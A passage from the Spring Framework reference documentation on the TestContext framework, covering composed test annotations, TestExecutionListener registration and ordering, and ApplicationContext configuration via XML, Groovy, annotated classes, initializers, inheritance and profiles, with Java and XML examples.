this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@ExtendWith(SpringExtension.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic @interface TransactionalDevTestConfig { }\n----\n\nThen we can use our custom `@TransactionalDevTestConfig` annotation to simplify the\nconfiguration of individual JUnit Jupiter based test classes as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TransactionalDevTestConfig\n\tclass OrderRepositoryTests { }\n\n\t@TransactionalDevTestConfig\n\tclass UserRepositoryTests { }\n----\n\nSince JUnit Jupiter supports the use of `@Test`, `@RepeatedTest`, `ParameterizedTest`,\netc. as meta-annotations, it is also possible to create custom composed annotations at\nthe test method level. For example, if we wish to create a _composed annotation_ that\ncombines the `@Test` and `@Tag` annotations from JUnit Jupiter with the `@Transactional`\nannotation from Spring, we could create an `@TransactionalIntegrationTest` annotation as\nfollows.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.METHOD)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Transactional\n\t@Tag(\"integration-test\") \/\/ org.junit.jupiter.api.Tag\n\t@Test \/\/ org.junit.jupiter.api.Test\n\tpublic @interface TransactionalIntegrationTest { }\n----\n\nThen we can use our custom `@TransactionalIntegrationTest` annotation to simplify the\nconfiguration of individual JUnit Jupiter based test methods as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TransactionalIntegrationTest\n\tvoid saveOrder() { }\n\n\t@TransactionalIntegrationTest\n\tvoid deleteOrder() { }\n----\n\nFor further details, consult the <<core.adoc#annotation-programming-model,Spring\nAnnotation Programming Model>>.\n\n\n[[testcontext-framework]]\n=== Spring TestContext Framework\nThe __Spring TestContext Framework__ (located in the\n`org.springframework.test.context` package) provides generic, annotation-driven unit and\nintegration testing support that is agnostic of the testing framework in use. The\nTestContext framework also places a great deal of importance on __convention over\nconfiguration__ with reasonable defaults that can be overridden through annotation-based\nconfiguration.\n\nIn addition to generic testing infrastructure, the TestContext framework provides\nexplicit support for JUnit 4, JUnit Jupiter (a.k.a., JUnit 5), and TestNG. For JUnit 4\nand TestNG, Spring provides `abstract` support classes. Furthermore, Spring provides a\ncustom JUnit `Runner` and custom JUnit `Rules` for _JUnit 4_ as well as a custom\n`Extension` for _JUnit Jupiter_ that allow one to write so-called __POJO test classes__.\nPOJO test classes are not required to extend a particular class hierarchy such as the\n`abstract` support classes.\n\nThe following section provides an overview of the internals of the TestContext framework.\nIf you are only interested in _using_ the framework and not necessarily interested in\n_extending_ it with your own custom listeners or custom loaders, feel free to go directly\nto the configuration (<<testcontext-ctx-management,context management>>,\n<<testcontext-fixture-di,dependency injection>>, <<testcontext-tx,transaction\nmanagement>>), <<testcontext-support-classes,support classes>>, and\n<<integration-testing-annotations,annotation support>> sections.\n\n\n[[testcontext-key-abstractions]]\n==== Key abstractions\nThe core of the framework consists of the `TestContextManager` class and the\n`TestContext`, `TestExecutionListener`, and `SmartContextLoader` interfaces. A\n`TestContextManager` is created per test class (e.g., for the execution of all test\nmethods within a single test class in JUnit Jupiter). The `TestContextManager` in turn\nmanages a `TestContext` that holds the context of the current test. The\n`TestContextManager` also updates the state of the `TestContext` as the test progresses\nand delegates to `TestExecutionListener` implementations, which instrument the actual\ntest execution by providing dependency injection, managing transactions, and so on. A\n`SmartContextLoader` is responsible for loading an `ApplicationContext` for a given test\nclass. Consult the javadocs and the Spring test suite for further information and\nexamples of various implementations.\n\n===== TestContext\n`TestContext` encapsulates the context in which a test is executed, agnostic of the\nactual testing framework in use, and provides context management and caching support for\nthe test instance for which it is responsible. The `TestContext` also delegates to a\n`SmartContextLoader` to load an `ApplicationContext` if requested.\n\n===== TestContextManager\n`TestContextManager` is the main entry point into the __Spring TestContext Framework__\nand is responsible for managing a single `TestContext` and signaling events to each\nregistered `TestExecutionListener` at well-defined test execution points:\n\n* prior to any __before class__ or __before all__ methods of a particular testing framework\n* test instance post-processing\n* prior to any __before__ or __before each__ methods of a particular testing framework\n* immediately before execution of the test method but after test setup\n* immediately after execution of the test method but before test tear down\n* after any __after__ or __after each__ methods of a particular testing framework\n* after any __after class__ or __after all__ methods of a particular testing framework\n\n===== TestExecutionListener\n`TestExecutionListener` defines the API for reacting to test execution events published\nby the `TestContextManager` with which the listener is registered. See\n<<testcontext-tel-config>>.\n\n===== Context Loaders\n`ContextLoader` is a strategy interface that was introduced in Spring 2.5 for loading an\n`ApplicationContext` for an integration test managed by the Spring TestContext Framework.\nImplement `SmartContextLoader` instead of this interface in order to provide support for\nannotated classes, active bean definition profiles, test property sources, context\nhierarchies, and `WebApplicationContext` support.\n\n`SmartContextLoader` is an extension of the `ContextLoader` interface introduced in\nSpring 3.1. The `SmartContextLoader` SPI supersedes the `ContextLoader` SPI that was\nintroduced in Spring 2.5. Specifically, a `SmartContextLoader` can choose to process\nresource `locations`, annotated `classes`, or context `initializers`. Furthermore, a\n`SmartContextLoader` can set active bean definition profiles and test property sources in\nthe context that it loads.\n\nSpring provides the following implementations:\n\n* `DelegatingSmartContextLoader`: one of two default loaders which delegates internally\nto an `AnnotationConfigContextLoader`, a `GenericXmlContextLoader`, or a\n`GenericGroovyXmlContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes.\nGroovy support is only enabled if Groovy is on the classpath.\n* `WebDelegatingSmartContextLoader`: one of two default loaders which delegates\ninternally to an `AnnotationConfigWebContextLoader`, a `GenericXmlWebContextLoader`, or a\n`GenericGroovyXmlWebContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes. A\nweb `ContextLoader` will only be used if `@WebAppConfiguration` is present on the test\nclass. Groovy support is only enabled if Groovy is on the classpath.\n* `AnnotationConfigContextLoader`: loads a standard `ApplicationContext` from\n__annotated classes__.\n* `AnnotationConfigWebContextLoader`: loads a `WebApplicationContext` from __annotated\nclasses__.\n* `GenericGroovyXmlContextLoader`: loads a standard `ApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n* `GenericGroovyXmlWebContextLoader`: loads a `WebApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n* `GenericXmlContextLoader`: loads a standard `ApplicationContext` from XML __resource\nlocations__.\n* `GenericXmlWebContextLoader`: loads a `WebApplicationContext` from XML __resource\nlocations__.\n* `GenericPropertiesContextLoader`: loads a standard `ApplicationContext` from Java\nProperties files.\n\n[[testcontext-bootstrapping]]\n==== Bootstrapping the TestContext framework\n\nThe default configuration for the internals of the Spring TestContext Framework is\nsufficient for all common use cases. However, there are times when a development team or\nthird party framework would like to change the default `ContextLoader`, implement a\ncustom `TestContext` or `ContextCache`, augment the default sets of\n`ContextCustomizerFactory` and `TestExecutionListener` implementations, etc. For such low\nlevel control over how the TestContext framework operates, Spring provides a\nbootstrapping strategy.\n\n`TestContextBootstrapper` defines the SPI for _bootstrapping_ the TestContext framework.\nA `TestContextBootstrapper` is used by the `TestContextManager` to load the\n`TestExecutionListener` implementations for the current test and to build the\n`TestContext` that it manages. A custom bootstrapping strategy can be configured for a\ntest class (or test class hierarchy) via `@BootstrapWith`, either directly or as a\nmeta-annotation. If a bootstrapper is not explicitly configured via `@BootstrapWith`,\neither the `DefaultTestContextBootstrapper` or the `WebTestContextBootstrapper` will be\nused, depending on the presence of `@WebAppConfiguration`.\n\nSince the `TestContextBootstrapper` SPI is likely to change in the future in order to\naccommodate new requirements, implementers are strongly encouraged not to implement this\ninterface directly but rather to extend `AbstractTestContextBootstrapper` or one of its\nconcrete subclasses instead.\n\n[[testcontext-tel-config]]\n==== TestExecutionListener configuration\n\nSpring provides the following `TestExecutionListener` implementations that are registered\nby default, exactly in this order.\n\n* `ServletTestExecutionListener`: configures Servlet API mocks for a\n `WebApplicationContext`\n* `DirtiesContextBeforeModesTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _before_ modes\n* `DependencyInjectionTestExecutionListener`: provides dependency injection for the test\n instance\n* `DirtiesContextTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _after_ modes\n* `TransactionalTestExecutionListener`: provides transactional test execution with\n default rollback semantics\n* `SqlScriptsTestExecutionListener`: executes SQL scripts configured via the `@Sql`\n annotation\n\n[[testcontext-tel-config-registering-tels]]\n===== Registering custom TestExecutionListeners\n\nCustom ``TestExecutionListener``s can be registered for a test class and its subclasses\nvia the `@TestExecutionListeners` annotation. See\n<<integration-testing-annotations,annotation support>> and the javadocs for\n`@TestExecutionListeners` for details and examples.\n\n[[testcontext-tel-config-automatic-discovery]]\n===== Automatic discovery of default TestExecutionListeners\n\nRegistering custom ``TestExecutionListener``s via `@TestExecutionListeners` is suitable\nfor custom listeners that are used in limited testing scenarios; however, it can become\ncumbersome if a custom listener needs to be used across a test suite. Since Spring\nFramework 4.1, this issue is addressed via support for automatic discovery of _default_\n`TestExecutionListener` implementations via the `SpringFactoriesLoader` mechanism.\n\nSpecifically, the `spring-test` module declares all core default\n``TestExecutionListener``s under the\n`org.springframework.test.context.TestExecutionListener` key in its\n`META-INF\/spring.factories` properties file. Third-party frameworks and developers can\ncontribute their own ``TestExecutionListener``s to the list of default listeners in the\nsame manner via their own `META-INF\/spring.factories` properties file.\n\n[[testcontext-tel-config-ordering]]\n===== Ordering TestExecutionListeners\n\nWhen the TestContext framework discovers default ``TestExecutionListener``s via the\naforementioned `SpringFactoriesLoader` mechanism, the instantiated listeners are sorted\nusing Spring's `AnnotationAwareOrderComparator` which honors Spring's `Ordered` interface\nand `@Order` annotation for ordering. `AbstractTestExecutionListener` and all default\n``TestExecutionListener``s provided by Spring implement `Ordered` with appropriate\nvalues. Third-party frameworks and developers should therefore make sure that their\n_default_ ``TestExecutionListener``s are registered in the proper order by implementing\n`Ordered` or declaring `@Order`. Consult the javadocs for the `getOrder()` methods of the\ncore default ``TestExecutionListener``s for details on what values are assigned to each\ncore listener.\n\n[[testcontext-tel-config-merging]]\n===== Merging TestExecutionListeners\n\nIf a custom `TestExecutionListener` is registered via `@TestExecutionListeners`, the\n_default_ listeners will not be registered. In most common testing scenarios, this\neffectively forces the developer to manually declare all default listeners in addition to\nany custom listeners. The following listing demonstrates this style of configuration.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners({\n\t\tMyCustomTestExecutionListener.class,\n\t\tServletTestExecutionListener.class,\n\t\tDirtiesContextBeforeModesTestExecutionListener.class,\n\t\tDependencyInjectionTestExecutionListener.class,\n\t\tDirtiesContextTestExecutionListener.class,\n\t\tTransactionalTestExecutionListener.class,\n\t\tSqlScriptsTestExecutionListener.class\n\t})\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nThe challenge with this approach is that it requires that the developer know exactly\nwhich listeners are registered by default. Moreover, the set of default listeners can\nchange from release to release -- for example, `SqlScriptsTestExecutionListener` was\nintroduced in Spring Framework 4.1, and `DirtiesContextBeforeModesTestExecutionListener`\nwas introduced in Spring Framework 4.2. Furthermore, third-party frameworks like Spring\nSecurity register their own default ``TestExecutionListener``s via the aforementioned\n<<testcontext-tel-config-automatic-discovery, automatic discovery mechanism>>.\n\nTo avoid having to be aware of and re-declare **all** _default_ listeners, the\n`mergeMode` attribute of `@TestExecutionListeners` can be set to\n`MergeMode.MERGE_WITH_DEFAULTS`. `MERGE_WITH_DEFAULTS` indicates that locally declared\nlisteners should be merged with the default listeners. The merging algorithm ensures that\nduplicates are removed from the list and that the resulting set of merged listeners is\nsorted according to the semantics of `AnnotationAwareOrderComparator` as described in\n<<testcontext-tel-config-ordering>>. If a listener implements `Ordered` or is annotated\nwith `@Order` it can influence the position in which it is merged with the defaults;\notherwise, locally declared listeners will simply be appended to the list of default\nlisteners when merged.\n\nFor example, if the `MyCustomTestExecutionListener` class in the previous example\nconfigures its `order` value (for example, `500`) to be less than the order of the\n`ServletTestExecutionListener` (which happens to be `1000`), the\n`MyCustomTestExecutionListener` can then be automatically merged with the list of\ndefaults _in front of_ the `ServletTestExecutionListener`, and the previous example could\nbe replaced with the following.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners(\n\t\tlisteners = MyCustomTestExecutionListener.class,\n\t\tmergeMode = MERGE_WITH_DEFAULTS\n\t)\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n\n[[testcontext-ctx-management]]\n==== Context management\n\nEach `TestContext` provides context management and caching support for the test instance\nit is responsible for. Test instances do not automatically receive access to the\nconfigured `ApplicationContext`. However, if a test class implements the\n`ApplicationContextAware` interface, a reference to the `ApplicationContext` is supplied\nto the test instance. Note that `AbstractJUnit4SpringContextTests` and\n`AbstractTestNGSpringContextTests` implement `ApplicationContextAware` and therefore\nprovide access to the `ApplicationContext` automatically.\n\n.@Autowired ApplicationContext\n[TIP]\n====\nAs an alternative to implementing the `ApplicationContextAware` interface, you can\ninject the application context for your test class through the `@Autowired` annotation\non either a field or setter method. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\tpublic class MyTest {\n\n\t\t**@Autowired**\n\t\tprivate ApplicationContext applicationContext;\n\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, if your test is configured to load a `WebApplicationContext`, you can inject\nthe web application context into your test as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@WebAppConfiguration**\n\t@ContextConfiguration\n\tpublic class MyWebAppTest {\n\t\t**@Autowired**\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ class body...\n\t}\n----\n\nDependency injection via `@Autowired` is provided by the\n`DependencyInjectionTestExecutionListener` which is configured by default (see\n<<testcontext-fixture-di>>).\n====\n\nTest classes that use the TestContext framework do not need to extend any particular\nclass or implement a specific interface to configure their application context. Instead,\nconfiguration is achieved simply by declaring the `@ContextConfiguration` annotation at\nthe class level. If your test class does not explicitly declare application context\nresource `locations` or annotated `classes`, the configured `ContextLoader` determines\nhow to load a context from a default location or default configuration classes. In\naddition to context resource `locations` and annotated `classes`, an application context\ncan also be configured via application context `initializers`.\n\nThe following sections explain how to configure an `ApplicationContext` via XML\nconfiguration files, Groovy scripts, annotated classes (typically `@Configuration`\nclasses), or context initializers using Spring's `@ContextConfiguration` annotation.\nAlternatively, you can implement and configure your own custom `SmartContextLoader` for\nadvanced use cases.\n\n[[testcontext-ctx-management-xml]]\n===== Context configuration with XML resources\n\nTo load an `ApplicationContext` for your tests using XML configuration files, annotate\nyour test class with `@ContextConfiguration` and configure the `locations` attribute with\nan array that contains the resource locations of XML configuration metadata. A plain or\nrelative path -- for example `\"context.xml\"` -- will be treated as a classpath resource\nthat is relative to the package in which the test class is defined. A path starting with\na slash is treated as an absolute classpath location, for example\n`\"\/org\/example\/config.xml\"`. A path which represents a resource URL (i.e., a path\nprefixed with `classpath:`, `file:`, `http:`, etc.) will be used __as is__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/app-config.xml\" and\n\t\/\/ \"\/test-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(locations={\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` supports an alias for the `locations` attribute through the\nstandard Java `value` attribute. Thus, if you do not need to declare additional\nattributes in `@ContextConfiguration`, you can omit the declaration of the `locations`\nattribute name and declare the resource locations by using the shorthand format\ndemonstrated in the following example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@ContextConfiguration({\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default XML resource\nlocation. Specifically, `GenericXmlContextLoader` and `GenericXmlWebContextLoader` detect\na default location based on the name of the test class. If your class is named\n`com.example.MyTest`, `GenericXmlContextLoader` loads your application context from\n`\"classpath:com\/example\/MyTest-context.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTest-context.xml\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-groovy]]\n===== Context configuration with Groovy scripts\n\nTo load an `ApplicationContext` for your tests using Groovy scripts that utilize the\n<<core.adoc#groovy-bean-definition-dsl,Groovy Bean Definition DSL>>, annotate your test class with\n`@ContextConfiguration` and configure the `locations` or `value` attribute with an array\nthat contains the resource locations of Groovy scripts. Resource lookup semantics for\nGroovy scripts are the same as those described for <<testcontext-ctx-management-xml,XML\nconfiguration files>>.\n\n\n.Enabling Groovy script support\n[TIP]\n====\nSupport for using Groovy scripts to load an `ApplicationContext` in the Spring\nTestContext Framework is enabled automatically if Groovy is on the classpath.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/AppConfig.groovy\" and\n\t\/\/ \"\/TestConfig.groovy\" in the root of the classpath\n\t**@ContextConfiguration({\"\/AppConfig.groovy\", \"\/TestConfig.Groovy\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default Groovy script.\nSpecifically, `GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader`\ndetect a default location based on the name of the test class. If your class is named\n`com.example.MyTest`, the Groovy context loader will load your application context from\n`\"classpath:com\/example\/MyTestContext.groovy\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTestContext.groovy\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Declaring XML config and Groovy scripts simultaneously\n[TIP]\n====\nBoth XML configuration files and Groovy scripts can be declared simultaneously via the\n`locations` or `value` attribute of `@ContextConfiguration`. If the path to a configured\nresource location ends with `.xml` it will be loaded using an `XmlBeanDefinitionReader`;\notherwise it will be loaded using a `GroovyBeanDefinitionReader`.\n\nThe following listing demonstrates how to combine both in an integration test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"\/app-config.xml\" and \"\/TestConfig.groovy\"\n\t@ContextConfiguration({ \"\/app-config.xml\", \"\/TestConfig.groovy\" })\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n====\n\n[[testcontext-ctx-management-javaconfig]]\n===== Context configuration with annotated classes\n\nTo load an `ApplicationContext` for your tests using __annotated classes__ (see\n<<core.adoc#beans-java, Java-based container configuration>>),\nannotate your test class with `@ContextConfiguration` and configure the\n`classes` attribute with an array that contains references to annotated classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from AppConfig and TestConfig\n\t**@ContextConfiguration(classes = {AppConfig.class, TestConfig.class})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Annotated Classes\n[TIP]\n====\nThe term __annotated class__ can refer to any of the following.\n\n* A class annotated with `@Configuration`\n* A component (i.e., a class annotated with `@Component`, `@Service`, `@Repository`, etc.)\n* A JSR-330 compliant class that is annotated with `javax.inject` annotations\n* Any other class that contains `@Bean`-methods\n\nConsult the javadocs of `@Configuration` and `@Bean` for further information regarding\nthe configuration and semantics of __annotated classes__, paying special attention to\nthe discussion of __`@Bean` Lite Mode__.\n====\n\nIf you omit the `classes` attribute from the `@ContextConfiguration` annotation, the\nTestContext framework will attempt to detect the presence of default configuration\nclasses. Specifically, `AnnotationConfigContextLoader` and\n`AnnotationConfigWebContextLoader` will detect all `static` nested classes of the test class\nthat meet the requirements for configuration class implementations as specified in the\n`@Configuration` javadocs. In the following example, the `OrderServiceTest` class\ndeclares a `static` nested configuration class named `Config` that will be automatically\nused to load the `ApplicationContext` for the test class. Note that the name of the\nconfiguration class is arbitrary. In addition, a test class can contain more than one\n`static` nested configuration class if desired.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from the\n\t\/\/ static nested Config class\n\t**@ContextConfiguration**\n\tpublic class OrderServiceTest {\n\n\t\t@Configuration\n\t\tstatic class Config {\n\n\t\t\t\/\/ this bean will be injected into the OrderServiceTest class\n\t\t\t@Bean\n\t\t\tpublic OrderService orderService() {\n\t\t\t\tOrderService orderService = new OrderServiceImpl();\n\t\t\t\t\/\/ set properties, etc.\n\t\t\t\treturn orderService;\n\t\t\t}\n\t\t}\n\n\t\t@Autowired\n\t\tprivate OrderService orderService;\n\n\t\t@Test\n\t\tpublic void testOrderService() {\n\t\t\t\/\/ test the orderService\n\t\t}\n\n\t}\n----\n\n[[testcontext-ctx-management-mixed-config]]\n===== Mixing XML, Groovy scripts, and annotated classes\n\nIt may sometimes be desirable to mix XML configuration files, Groovy scripts, and\nannotated classes (i.e., typically `@Configuration` classes) to configure an\n`ApplicationContext` for your tests. For example, if you use XML configuration in\nproduction, you may decide that you want to use `@Configuration` classes to configure\nspecific Spring-managed components for your tests, or vice versa.\n\nFurthermore, some third-party frameworks (like Spring Boot) provide first-class support\nfor loading an `ApplicationContext` from different types of resources simultaneously\n(e.g., XML configuration files, Groovy scripts, and `@Configuration` classes). The Spring\nFramework historically has not supported this for standard deployments. Consequently,\nmost of the `SmartContextLoader` implementations that the Spring Framework delivers in\nthe `spring-test` module support only one resource type per test context; however, this\ndoes not mean that you cannot use both. One exception to the general rule is that the\n`GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader` support both XML\nconfiguration files and Groovy scripts simultaneously. Furthermore, third-party\nframeworks may choose to support the declaration of both `locations` and `classes` via\n`@ContextConfiguration`, and with the standard testing support in the TestContext\nframework, you have the following options.\n\nIf you want to use resource locations (e.g., XML or Groovy) __and__ `@Configuration`\nclasses to configure your tests, you will have to pick one as the __entry point__, and\nthat one will have to include or import the other. For example, in XML or Groovy scripts\nyou can include `@Configuration` classes via component scanning or define them as normal\nSpring beans; whereas, in a `@Configuration` class you can use `@ImportResource` to\nimport XML configuration files or Groovy scripts. Note that this behavior is semantically\nequivalent to how you configure your application in production: in production\nconfiguration you will define either a set of XML or Groovy resource locations or a set\nof `@Configuration` classes that your production `ApplicationContext` will be loaded\nfrom, but you still have the freedom to include or import the other type of configuration.\n\n[[testcontext-ctx-management-initializers]]\n===== Context configuration with context initializers\nTo configure an `ApplicationContext` for your tests using context initializers, annotate\nyour test class with `@ContextConfiguration` and configure the `initializers` attribute\nwith an array that contains references to classes that implement\n`ApplicationContextInitializer`. The declared context initializers will then be used to\ninitialize the `ConfigurableApplicationContext` that is loaded for your tests. Note that\nthe concrete `ConfigurableApplicationContext` type supported by each declared\ninitializer must be compatible with the type of `ApplicationContext` created by the\n`SmartContextLoader` in use (i.e., typically a `GenericApplicationContext`).\nFurthermore, the order in which the initializers are invoked depends on whether they\nimplement Spring's `Ordered` interface or are annotated with Spring's `@Order` annotation\nor the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from TestConfig\n\t\/\/ and initialized by TestAppCtxInitializer\n\t**@ContextConfiguration(\n\t\tclasses = TestConfig.class,\n\t\tinitializers = TestAppCtxInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIt is also possible to omit the declaration of XML configuration files, Groovy scripts,\nor annotated classes in `@ContextConfiguration` entirely and instead declare only\n`ApplicationContextInitializer` classes which are then responsible for registering beans\nin the context -- for example, by programmatically loading bean definitions from XML\nfiles or configuration classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by EntireAppInitializer\n\t\/\/ which presumably registers beans in the context\n\t**@ContextConfiguration(initializers = EntireAppInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-inheritance]]\n===== Context configuration inheritance\n`@ContextConfiguration` supports boolean `inheritLocations` and `inheritInitializers`\nattributes that denote whether resource locations or annotated classes and context\ninitializers declared by superclasses should be __inherited__. The default value for\nboth flags is `true`. This means that a test class inherits the resource locations or\nannotated classes as well as the context initializers declared by any superclasses.\nSpecifically, the resource locations or annotated classes for a test class are appended\nto the list of resource locations or annotated classes declared by superclasses.\nSimilarly, the initializers for a given test class will be added to the set of\ninitializers defined by test superclasses. Thus, subclasses have the option\nof __extending__ the resource locations, annotated classes, or context initializers.\n\nIf the `inheritLocations` or `inheritInitializers` attribute in `@ContextConfiguration`\nis set to `false`, the resource locations or annotated classes and the context\ninitializers, respectively, for the test class __shadow__ and effectively replace the\nconfiguration defined by superclasses.\n\nIn the following example that uses XML resource locations, the `ApplicationContext` for\n`ExtendedTest` will be loaded from __\"base-config.xml\"__ __and__\n__\"extended-config.xml\"__, in that order. Beans defined in __\"extended-config.xml\"__ may\ntherefore __override__ (i.e., replace) those defined in __\"base-config.xml\"__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\"\n\t\/\/ in the root of the classpath\n\t**@ContextConfiguration(\"\/base-config.xml\")**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\" and\n\t\/\/ \"\/extended-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(\"\/extended-config.xml\")**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, in the following example that uses annotated classes, the\n`ApplicationContext` for `ExtendedTest` will be loaded from the `BaseConfig` __and__\n`ExtendedConfig` classes, in that order. Beans defined in `ExtendedConfig` may therefore\noverride (i.e., replace) those defined in `BaseConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from BaseConfig\n\t**@ContextConfiguration(classes = BaseConfig.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from BaseConfig and ExtendedConfig\n\t**@ContextConfiguration(classes = ExtendedConfig.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIn the following example that uses context initializers, the `ApplicationContext` for\n`ExtendedTest` will be initialized using `BaseInitializer` __and__\n`ExtendedInitializer`. Note, however, that the order in which the initializers are\ninvoked depends on whether they implement Spring's `Ordered` interface or are annotated\nwith Spring's `@Order` annotation or the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t**@ContextConfiguration(initializers = BaseInitializer.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t\/\/ and ExtendedInitializer\n\t**@ContextConfiguration(initializers = ExtendedInitializer.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles]]\n===== Context configuration with environment profiles\nSpring 3.1 introduced first-class support in the framework for the notion of\nenvironments and profiles (a.k.a., __bean definition profiles__), and integration tests\ncan be configured to activate particular bean definition profiles for various testing\nscenarios. This is achieved by annotating a test class with the `@ActiveProfiles`\nannotation and supplying a list of profiles that should be activated when loading the\n`ApplicationContext` for the test.\n\n[NOTE]\n====\n`@ActiveProfiles` may be used with any implementation of the new `SmartContextLoader`\nSPI, but `@ActiveProfiles` is not supported with implementations of the older\n`ContextLoader` SPI.\n====\n\nLet's take a look at some examples with XML configuration and `@Configuration` classes.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- app-config.xml -->\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<bean id=\"transferService\"\n\t\t\t\tclass=\"com.bank.service.internal.DefaultTransferService\">\n\t\t\t<constructor-arg ref=\"accountRepository\"\/>\n\t\t\t<constructor-arg ref=\"feePolicy\"\/>\n\t\t<\/bean>\n\n\t\t<bean 